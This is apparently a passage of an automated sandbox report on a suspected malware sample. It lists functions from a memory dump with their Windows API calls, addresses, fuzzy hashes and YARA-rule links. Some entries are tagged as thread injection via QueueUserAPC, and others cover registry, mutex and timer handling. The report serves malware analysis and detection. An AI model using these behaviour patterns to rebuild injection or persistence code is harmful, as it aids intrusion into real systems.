lstrlenW.KERNEL32(?), ref: 0302CE40
wcstombs.NTDLL ref: 0302CE60
lstrlen.KERNEL32(00000000,?,?,?,?,?), ref: 0302CE84
mbstowcs.NTDLL ref: 0302CEA6
HeapFree.KERNEL32(00000000,00000000), ref: 0302CEB8
HeapFree.KERNEL32(00000000,00000000,?,?), ref: 0302CED2

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: FreeHeaplstrlen$mbstowcswcstombs
String ID:
API String ID: 4205542590-0
Opcode ID: a459b1150669e454ba5652ce5d27c02f8eb32d7db8ff692a8d41eb16f2f7d82d
Instruction ID: eb18db315eb31f649623ca65225ecd48cde5a863923159c82953630af0ff70b5
Opcode Fuzzy Hash: a459b1150669e454ba5652ce5d27c02f8eb32d7db8ff692a8d41eb16f2f7d82d
Instruction Fuzzy Hash: 9C213DB9501209FBDF11EFA4ED08F9E7FB9EB44300F144165F50096150D7759A60EB60

Uniqueness

Uniqueness Score: -1.00%

Function 0303CAF7 Relevance: 9.1, APIs: 6, Instructions: 64memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(0303FE29,00000000,00000000,00000008,00000000,?,0303FE29,030399AD,00000000,?), ref: 0303CB0D
RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 0303CB20
lstrcpy.KERNEL32(00000008,0303FE29), ref: 0303CB42
GetLastError.KERNEL32(0302C2B8,00000000,00000000,?,0303FE29,030399AD,00000000,?), ref: 0303CB6B
HeapFree.KERNEL32(00000000,00000000,?,0303FE29,030399AD,00000000,?), ref: 0303CB83
CloseHandle.KERNEL32(00000000,0302C2B8,00000000,00000000,?,0303FE29,030399AD,00000000,?), ref: 0303CB8C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Heap$AllocateCloseErrorFreeHandleLastlstrcpylstrlen
String ID:
API String ID: 2860611006-0
Opcode ID: cd53f658589ac7f0f0f4210dc569f8baa729e601bd6d852c09c593cc9b176ecb
Instruction ID: 8d4ba8c12e3fb8dfee0f938b87494d4f7c4abe747133313c60ef00bc67e2134c
Opcode Fuzzy Hash: cd53f658589ac7f0f0f4210dc569f8baa729e601bd6d852c09c593cc9b176ecb
Instruction Fuzzy Hash: 361193B9102209EFEB50EF78D98899EBBACFB02260704496AF556D3210D7349E10CB60

Uniqueness

Uniqueness Score: -1.00%

Function 03032DF0 Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,00000000,?,03048194,0302678D), ref: 03032E07
QueueUserAPC.KERNEL32(?,00000000,?), ref: 03032E1C
GetLastError.KERNEL32(00000000), ref: 03032E27
TerminateThread.KERNEL32(00000000,00000000), ref: 03032E31
CloseHandle.KERNEL32(00000000), ref: 03032E38
SetLastError.KERNEL32(00000000), ref: 03032E41

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: 474fc986496fad11ffcc5753912a7fdcb84076455d7106db3cb251ac21a11350
Instruction ID: 0c94b81f6f792469a93e281e986f9734a9319288bab581d68954cad3023d8d2c
Opcode Fuzzy Hash: 474fc986496fad11ffcc5753912a7fdcb84076455d7106db3cb251ac21a11350
Instruction Fuzzy Hash: 9BF082BE207220BBD7227BA4AE09F4BFA6CFB09B01F001940F64590068C7294A20CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0303816A Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 030381C5
SetLastError.KERNEL32(00000000,?,?,?), ref: 03038219

Strings

vids, xrefs: 03038224

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ErrorLastmemset
String ID: vids
API String ID: 3276359510-3767230166
Opcode ID: c48351d2ef8b63e28ddb6696142373a781b4b9bb3a09ff63f2469e2ea4bfbebd
Instruction ID: e73fe844e4c6d71a6204780abf834ea35f224e863ea2f782e47f53ab194d5ecd
Opcode Fuzzy Hash: c48351d2ef8b63e28ddb6696142373a781b4b9bb3a09ff63f2469e2ea4bfbebd
Instruction Fuzzy Hash: 308138B5D022299FCF10DFA4C9849DDBBB9EF49700F1085AAF819EB250D7749A45CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 03023D45 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?), ref: 03023DCF
lstrlen.KERNEL32(?,?), ref: 03023E00
memcpy.NTDLL(00000008,?,00000001), ref: 03023E0F
HeapFree.KERNEL32(00000000,00000000,?), ref: 03023E91

Strings

W, xrefs: 03023D50

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Heap$AllocateFreelstrlenmemcpy
String ID: W
API String ID: 379260646-655174618
Opcode ID: 375e50cea5f6cbefc3d60e16563562f485a7355ff408900db4d081bc89622b25
Instruction ID: 46c155142a7f291577780d1a8509b3332bf7c639ab95e06a5f636dbe559c1929
Opcode Fuzzy Hash: 375e50cea5f6cbefc3d60e16563562f485a7355ff408900db4d081bc89622b25
Instruction Fuzzy Hash: 8C41D27C5033299FCBA4CF29E9887DABFE9AF05304F0884AAE49987264C3389545CB44

Uniqueness

Uniqueness Score: -1.00%

Function 030212B7 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 112COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 03021362
FlushFileBuffers.KERNEL32(00000000,?,?,00000050), ref: 030213CF
GetLastError.KERNEL32(?,?,00000050), ref: 030213D9

Strings

K, xrefs: 03021390
P, xrefs: 0302138C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: BuffersErrorFileFlushLastmemset
String ID: K$P
API String ID: 3817869962-420285281
Opcode ID: 0bdd0c36b463ab5ab3021247948549039bd5db45b1282f9e18038ebdb9f67f04
Instruction ID: f408a14902bcec80bbf2d841b34974368ed5827b6557ed90cf4c0de979fd32b7
Opcode Fuzzy Hash: 0bdd0c36b463ab5ab3021247948549039bd5db45b1282f9e18038ebdb9f67f04
Instruction Fuzzy Hash: E1418E71A01715DFDB68CFA8CA84AAFBBF6FF44700F18456DD48693A40D334A649CB91

Uniqueness

Uniqueness Score: -1.00%

Function 030223FC Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0302241E

Part of subcall function 030384EA: RtlNtStatusToDosError.NTDLL(00000000), ref: 03038522
Part of subcall function 030384EA: SetLastError.KERNEL32(00000000), ref: 03038529

GetLastError.KERNEL32(?,00000000,?,00000318,00000020,?,00010003), ref: 0302252E

Part of subcall function 03024153: RtlNtStatusToDosError.NTDLL(00000000), ref: 0302416B

memcpy.NTDLL(?,03042580,00000100,?,00010003), ref: 030224AD
RtlNtStatusToDosError.NTDLL(00000000), ref: 03022507

Strings

, xrefs: 03022474

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Error$Status$Last$memcpymemset
String ID:
API String ID: 945571674-3916222277
Opcode ID: 1da82819ee1e7d6d1c656112d899f76a85e05e442438297552ad7c5d9a60709d
Instruction ID: 82c50862e578c8dba203638e69f4eba9ca31891bb5c5f42611479d5832188c54
Opcode Fuzzy Hash: 1da82819ee1e7d6d1c656112d899f76a85e05e442438297552ad7c5d9a60709d
Instruction Fuzzy Hash: 18319175902329EFDB60DFA4D994A9EBBFCFB04204F1489AAE405D7640E770EA448B50

Uniqueness

Uniqueness Score: -1.00%

Function 0303B7BF Relevance: 7.7, APIs: 5, Instructions: 186memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?), ref: 0303B83E
wsprintfA.USER32 ref: 0303B920
memcpy.NTDLL(00000000,?,?), ref: 0303B96D
InterlockedExchange.KERNEL32(03048148,00000000), ref: 0303B98B
HeapFree.KERNEL32(00000000,00000000), ref: 0303B9CC

Part of subcall function 0302EE4A: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0302EE73
Part of subcall function 0302EE4A: memcpy.NTDLL(00000000,?,?), ref: 0302EE86
Part of subcall function 0302EE4A: RtlEnterCriticalSection.NTDLL(03048448), ref: 0302EE97
Part of subcall function 0302EE4A: RtlLeaveCriticalSection.NTDLL(03048448), ref: 0302EEAC
Part of subcall function 0302EE4A: HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0302EEE4

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Heap$AllocateCriticalFreeSectionmemcpy$EnterExchangeInterlockedLeavewsprintf
String ID:
API String ID: 119082218-0
Opcode ID: 7d56d727fe87ba423ce0fa3e539142322eff2c6cfb5726dc04b88844291e5327
Instruction ID: 71558cf33ca7530347079a9a1c9a2960e9607863ffde07179649d771a552787e
Opcode Fuzzy Hash: 7d56d727fe87ba423ce0fa3e539142322eff2c6cfb5726dc04b88844291e5327
Instruction Fuzzy Hash: 06617CB5902209AFDB10EFA8DC84EEE7BFDEB45304F08856AE80597210D775AA15CB90

Uniqueness

Uniqueness Score: -1.00%

Function 03033C1F Relevance: 7.7, APIs: 6, Instructions: 163COMMON

Download Yara Rule

APIs

memcpy.NTDLL(00000000,?,00000010), ref: 03033C70
memcpy.NTDLL(00000000,?,?,00000010), ref: 03033D03
GetLastError.KERNEL32(?,?,00000010), ref: 03033D5B
GetLastError.KERNEL32 ref: 03033D8D
GetLastError.KERNEL32 ref: 03033DA1
GetLastError.KERNEL32 ref: 03033DB6

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ErrorLast$memcpy
String ID:
API String ID: 2760375183-0
Opcode ID: e67ebf6b3b28f48a80630358c6fde00d16028c352691418393f30cdfad123427
Instruction ID: fbb3bdac290f4247d4859da5440b50068bcb51e8dc93b3d8664f109a65c47467
Opcode Fuzzy Hash: e67ebf6b3b28f48a80630358c6fde00d16028c352691418393f30cdfad123427
Instruction Fuzzy Hash: 8D516BB9901209BFDF10DFA8ED88AEEBBBCFB45750F0484A5F911E6240D7348A14CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0302F6B3 Relevance: 7.7, APIs: 5, Instructions: 157registryfilememoryCOMMON

Download Yara Rule

APIs

Part of subcall function 030303AF: RegCloseKey.ADVAPI32(?,?,0302F6FE,00000000,00000000,?), ref: 03030436

RegCloseKey.ADVAPI32(?,?,?,00000000,?), ref: 0302F823

Part of subcall function 0302D13A: lstrlenW.KERNEL32(80000001,03047B80,03047CC8,80000001,?,?,030214FC,?), ref: 0302D146
Part of subcall function 0302D13A: memcpy.NTDLL(00000000,00000002,00000000,00000002,?,?,030214FC,?), ref: 0302D16E
Part of subcall function 0302D13A: memset.NTDLL ref: 0302D180

Part of subcall function 030229AD: lstrlenW.KERNEL32(?), ref: 030229C0
Part of subcall function 030229AD: lstrlen.KERNEL32(?), ref: 030229CB
Part of subcall function 030229AD: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 030229E0

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,00000000,00000000,00000000,?), ref: 0302F858
GetLastError.KERNEL32 ref: 0302F863
HeapFree.KERNEL32(00000000,00000000), ref: 0302F879
RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,?), ref: 0302F88B

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Closelstrlen$Heap$AllocateCreateErrorFileFreeLastmemcpymemset
String ID:
API String ID: 3434821807-0
Opcode ID: 8969b1ff31e83c9c00941c3f38b1a9d78848be5a44f88752fba4ee754b780cc5
Instruction ID: 014c2f3cf0f12fca08fc1c1b2f792f189b2d251221a616c0efc9a7f6033b3470
Opcode Fuzzy Hash: 8969b1ff31e83c9c00941c3f38b1a9d78848be5a44f88752fba4ee754b780cc5
Instruction Fuzzy Hash: 7351AEB990221AEFDB51EBA4DD80EEEBBBCFF44340B1444A5E904E6114E735EB11DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0303E015 Relevance: 7.6, APIs: 5, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,03043079,?), ref: 0303E0B9
memcpy.NTDLL(00000000,00000000,00000000,?,0304304C,?,?,?,?,0302CE7D,?,?,?,?,?), ref: 0303E0D0
HeapFree.KERNEL32(00000000,00000000), ref: 0303E0E3
memcpy.NTDLL(00000000,?,?,?,0304304C,?,?,?,?,0302CE7D,?,?,?,?,?), ref: 0303E0F2
HeapFree.KERNEL32(00000000,00000000,?,?,?,0304304C,?,?,?,?,0302CE7D,?,?,?,?,?), ref: 0303E156

Part of subcall function 0303EC2D: RtlLeaveCriticalSection.NTDLL(?), ref: 0303ECAA

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Heap$Freememcpy$AllocateCriticalLeaveSection
String ID:
API String ID: 1878246414-0
Opcode ID: f18292d9f1ae70325f798519fb9c6e84d4995f1ab63a2448429ec4afbb2aaadb
Instruction ID: 937aaa8a5892e2fbc334a03b7d9d8996d51b100c0de746c38c73bd92c70bef0f
Opcode Fuzzy Hash: f18292d9f1ae70325f798519fb9c6e84d4995f1ab63a2448429ec4afbb2aaadb
Instruction Fuzzy Hash: 5D419276502218AFDF21EFA8DC44BDEBBA9EF46340F044665F904AB260C771DA90DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0303F262 Relevance: 7.6, APIs: 5, Instructions: 124stringthreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0303F2A3
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0303F33E
_strupr.NTDLL ref: 0303F369
lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 0303F376
CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 0303F390

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: CloseCurrentHandleOpenProcessThread_struprlstrlen
String ID:
API String ID: 3785718266-0
Opcode ID: 021bae08def387f62409210513f6b5acf644fa5759ed96c00a3b8f85066e03de
Instruction ID: 074d59496417f7a7f46e09ddcb5d94f99cb6933561281d9e0468062e2a772a5a
Opcode Fuzzy Hash: 021bae08def387f62409210513f6b5acf644fa5759ed96c00a3b8f85066e03de
Instruction Fuzzy Hash: 964149B9D02219FBDF21EFA4CD45BEEBBB8AB49700F1444A6E610A6150D7748A80CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0302F2AE Relevance: 7.6, APIs: 5, Instructions: 123memoryregistrysynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0303F514: RegCreateKeyA.ADVAPI32(80000001,03048164,030483D0), ref: 0303F529
Part of subcall function 0303F514: lstrlen.KERNEL32(03048164,00000000,00000000,0304706E,?,?,?,030332F0,00000001,00000000,030483D0), ref: 0303F552

HeapFree.KERNEL32(00000000,00000000,?,00000000,?,030333D4,0302D497,00000000,00000001,03026FCB,00000000), ref: 0302F36D
WaitForSingleObject.KERNEL32(00000000,?,00000000,?,030333D4,0302D497,00000000,00000001,03026FCB,00000000), ref: 0302F3D3
HeapFree.KERNEL32(00000000,00000000,?,00000000,?,030333D4,0302D497,00000000,00000001,03026FCB,00000000), ref: 0302F3FC
HeapFree.KERNEL32(00000000,0302D497,?,00000000,?,030333D4,0302D497,00000000,00000001,03026FCB,00000000), ref: 0302F40C
RegCloseKey.ADVAPI32(030333D4,?,00000000,?,030333D4,0302D497,00000000,00000001,03026FCB,00000000), ref: 0302F415

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: FreeHeap$CloseCreateObjectSingleWaitlstrlen
String ID:
API String ID: 2002143150-0
Opcode ID: 52ac9280cc1172207f5f36a3535ee208a54670b53b10841296130725da48da7e
Instruction ID: 962494c35e349f4a8608aa79f7a535232145fa42faa416cb7cbae2aadaf744a8
Opcode Fuzzy Hash: 52ac9280cc1172207f5f36a3535ee208a54670b53b10841296130725da48da7e
Instruction Fuzzy Hash: CF41D7B9C0222AFFDF11EFE4D9848EEBFB9FB08344F14846AE511A2110D3355A549F64

Uniqueness

Uniqueness Score: -1.00%

Function 0302D221 Relevance: 7.6, APIs: 5, Instructions: 121memorysynchronizationCOMMON

Download Yara Rule

APIs

ReleaseMutex.KERNEL32(03048180,00000000,?,?,?,03027FC0), ref: 0302D2AC
ResetEvent.KERNEL32(03048184,00000000,?,?,?,03027FC0), ref: 0302D2C4
HeapFree.KERNEL32(00000000,03048368,?,?,03027FC0), ref: 0302D30D
RtlRemoveVectoredExceptionHandler.NTDLL(03048188), ref: 0302D347
LocalFree.KERNEL32(?,?,03027FC0), ref: 0302D38D

Part of subcall function 0302288A: GetVersion.KERNEL32(?,00000000,030431E8,?,0302D23B,00000000,?,?,?,03027FC0), ref: 030228AE
Part of subcall function 0302288A: GetModuleHandleA.KERNEL32(?,0609233E,?,0302D23B,00000000,?,?,?,03027FC0), ref: 030228CB
Part of subcall function 0302288A: GetProcAddress.KERNEL32(00000000), ref: 030228D2

Part of subcall function 0302C266: RtlEnterCriticalSection.NTDLL(03048420), ref: 0302C270
Part of subcall function 0302C266: RtlLeaveCriticalSection.NTDLL(03048420), ref: 0302C2AC

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: CriticalFreeSection$AddressEnterEventExceptionHandleHandlerHeapLeaveLocalModuleMutexProcReleaseRemoveResetVectoredVersion
String ID:
API String ID: 837102172-0
Opcode ID: 93086fc0b5ab493258fcb00f8c06afca15f9ffb394efe74fd6078541069e3d0c
Instruction ID: 71901dbe857549fd2a96d841d24911ef8075eaaf6f6654e931779664244180c8
Opcode Fuzzy Hash: 93086fc0b5ab493258fcb00f8c06afca15f9ffb394efe74fd6078541069e3d0c
Instruction Fuzzy Hash: FF41B6F9603215AFDB60FFACEEC5A587BEDAB403007588866E610D7168C73ADE54CB10

Uniqueness

Uniqueness Score: -1.00%

Function 0302DABC Relevance: 7.6, APIs: 5, Instructions: 109memoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0303E52A: GetCurrentThreadId.KERNEL32 ref: 0303E562
Part of subcall function 0303E52A: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,0302A177,000004D2), ref: 0303E56E
Part of subcall function 0303E52A: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,0302A177,000004D2), ref: 0303E57C
Part of subcall function 0303E52A: lstrcpy.KERNEL32(00000000), ref: 0303E59E

StrChrA.SHLWAPI(?,0000002C,00003219), ref: 0302DB06
HeapFree.KERNEL32(00000000,00000000,?,?,00000001), ref: 0302DBB5
DeleteFileA.KERNEL32(?,?,00000015,00003219), ref: 0302DBDE
HeapFree.KERNEL32(00000000,?), ref: 0302DBF0
HeapFree.KERNEL32(00000000,?,00003219), ref: 0302DC01

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: FileFreeHeap$Time$CurrentDeleteNameSystemTempThreadlstrcpy
String ID:
API String ID: 1454751375-0
Opcode ID: d74797b1a27c80836b963470d93916fa0b3ddef1d7cafe9b2e526b423a34f9de
Instruction ID: 1f37c926c8ee8c0fa121048bf7d2144dee31c632ead6089e5880ee32a877f42a
Opcode Fuzzy Hash: d74797b1a27c80836b963470d93916fa0b3ddef1d7cafe9b2e526b423a34f9de
Instruction Fuzzy Hash: 6041DFB6106312EFE741EF18DC04F9ABBECEB45700F044829F65486190D735EA098BA6

Uniqueness

Uniqueness Score: -1.00%

Function 0303853A Relevance: 7.6, APIs: 5, Instructions: 102synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 030402A5: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 030402B1
Part of subcall function 030402A5: SetLastError.KERNEL32(000000B7,?,0303854E,?,?,00000000,?,?,?,?,?,?), ref: 030402C2

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?,?,?,?), ref: 0303856E
CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?), ref: 03038646

Part of subcall function 0303BF9A: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0303BFB4
Part of subcall function 0303BF9A: CreateWaitableTimerA.KERNEL32(03048208,00000003,?), ref: 0303BFD1
Part of subcall function 0303BF9A: GetLastError.KERNEL32(?,?,030385A2,?,?,?,00000000,?,?,?,?,?,?), ref: 0303BFE2
Part of subcall function 0303BF9A: GetSystemTimeAsFileTime.KERNEL32(?,00000000,030385A2,?,?,?,030385A2,?), ref: 0303C022
Part of subcall function 0303BF9A: SetWaitableTimer.KERNEL32(00000000,030385A2,00000000,00000000,00000000,00000000,?,?,030385A2,?), ref: 0303C041
Part of subcall function 0303BF9A: HeapFree.KERNEL32(00000000,030385A2,00000000,030385A2,?,?,?,030385A2,?), ref: 0303C057

GetLastError.KERNEL32(?,?,?,00000000,?,?,?,?,?,?), ref: 0303862F
ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?), ref: 03038638

Part of subcall function 030402A5: CreateMutexA.KERNEL32(03048208,00000000,?,?,0303854E,?,?,00000000,?,?,?,?,?,?), ref: 030402D5

GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?), ref: 03038653

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ErrorLast$MutexTimerWaitable$CreateOpenTime$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
String ID:
API String ID: 1700416623-0
Opcode ID: 9ffe6cfbd5ef6b578c7da62794f4e7b3184257e4912cbb70b91996bb53808058
Instruction ID: b6c54f11669e38e0019c019b91e297327b0875dd2b8344f64a69e762f43df17a
Opcode Fuzzy Hash: 9ffe6cfbd5ef6b578c7da62794f4e7b3184257e4912cbb70b91996bb53808058
Instruction Fuzzy Hash: 4131A2B96023089FC711FF74D9549AA7BBDFB8A304B148DA5F812DB254DB368A10CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0303B9D9 Relevance: 7.6, APIs: 5, Instructions: 97memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000007), ref: 0303BA5B
lstrcpy.KERNEL32(00000000,?), ref: 0303BA74
lstrcpyn.KERNEL32(00000006,00000000,00000001,?,?,?,?,?,00000000,00000000,?), ref: 0303BA81
lstrlen.KERNEL32(0304932D,?,?,?,?,?,00000000,00000000,?), ref: 0303BA93
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000,00000000), ref: 0303BAC4

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Heap$AllocateFreelstrcpylstrcpynlstrlen
String ID:
API String ID: 2734445380-0
Opcode ID: bbafa8a0a790cb917e6d18f3a21b1a6641e6ef61b1c19b156be89a4c97b8c458
Instruction ID: e6c609533462506d2371950825ba18331e3afda70f11a2b17b8a203911aa29d2
Opcode Fuzzy Hash: bbafa8a0a790cb917e6d18f3a21b1a6641e6ef61b1c19b156be89a4c97b8c458
Instruction Fuzzy Hash: DD318DB6502608EFDB11DF95CC48EEFBFB8EF45214F048164F91592204D7349A11DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03033E4E Relevance: 7.6, APIs: 5, Instructions: 89memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0303592E: RtlEnterCriticalSection.NTDLL(03048448), ref: 03035936
Part of subcall function 0303592E: RtlLeaveCriticalSection.NTDLL(03048448), ref: 0303594B
Part of subcall function 0303592E: InterlockedIncrement.KERNEL32(0000001C), ref: 03035964

RtlAllocateHeap.NTDLL(00000000,?,?), ref: 03033E85
memcpy.NTDLL(00000000,?,?), ref: 03033E96
lstrcmpi.KERNEL32(00000002,?), ref: 03033EDC
memcpy.NTDLL(00000000,?,?), ref: 03033EF0
HeapFree.KERNEL32(00000000,00000000,?), ref: 03033F36

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: CriticalHeapSectionmemcpy$AllocateEnterFreeIncrementInterlockedLeavelstrcmpi
String ID:
API String ID: 733514052-0
Opcode ID: 3a1573dfbd0b9f949b94191e3145e52428b213d6ec7174da58ffba14bc93837a
Instruction ID: 11e2c17967c721f0541dd58a4f69a0aac44e914f651e9abe8a4a5dcd64588443
Opcode Fuzzy Hash: 3a1573dfbd0b9f949b94191e3145e52428b213d6ec7174da58ffba14bc93837a
Instruction Fuzzy Hash: 7831D5BAA02219BFDB10EFA8DCC4A9E7BBCFF45210F1444A9F90597250E7759E448B50

Uniqueness

Uniqueness Score: -1.00%

Function 0302D87E Relevance: 7.6, APIs: 5, Instructions: 84sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0303E4F0: memset.NTDLL ref: 0303E4FA

OpenEventA.KERNEL32(00000002,00000000,03048314,?,00000000,00000000,?,03031E07,?,00000000,?,?,0302DA8B,?,?,?), ref: 0302D918
SetEvent.KERNEL32(00000000,?,03031E07,?,00000000,?,?,0302DA8B,?,?,?), ref: 0302D925
Sleep.KERNEL32(00000BB8,?,03031E07,?,00000000,?,?,0302DA8B,?,?,?), ref: 0302D930
ResetEvent.KERNEL32(00000000,?,03031E07,?,00000000,?,?,0302DA8B,?,?,?), ref: 0302D937
CloseHandle.KERNEL32(00000000,?,03031E07,?,00000000,?,?,0302DA8B,?,?,?), ref: 0302D93E

Part of subcall function 03040C20: RegCloseKey.ADVAPI32(00000000), ref: 03040CA3

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: Event$Close$HandleOpenResetSleepmemset
String ID:
API String ID: 869721410-0
Opcode ID: 4fdfde425344edaf938957d257335ed6fd2a4d57800393af24c9c2ea171fbf50
Instruction ID: d762d18f69ff49f0d0759c8cf766ae1abde44e8e5ac76a68392b55e5f3708af8
Opcode Fuzzy Hash: 4fdfde425344edaf938957d257335ed6fd2a4d57800393af24c9c2ea171fbf50
Instruction Fuzzy Hash: AB21C8FE203220ABD310FB6AAD48E6BBBADABC9A11F14C505F61987108D7399D01C765

Uniqueness

Uniqueness Score: -1.00%

Function 0302E852 Relevance: 7.6, APIs: 5, Instructions: 83memorytimeCOMMON

Download Yara Rule

APIs

Part of subcall function 0303F85D: lstrlen.KERNEL32(?,03048368,?,00000008,030403F4,?,00000000,?,00000000,03048374,03048374,030430F0,0303C6CE,?,?,?), ref: 0303F869

RtlEnterCriticalSection.NTDLL(03048448), ref: 0302E87C
